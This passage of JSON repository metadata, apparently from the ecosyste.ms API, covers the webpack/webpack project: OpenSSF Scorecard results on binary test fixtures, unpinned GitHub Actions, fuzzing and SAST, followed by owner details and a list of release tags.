test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/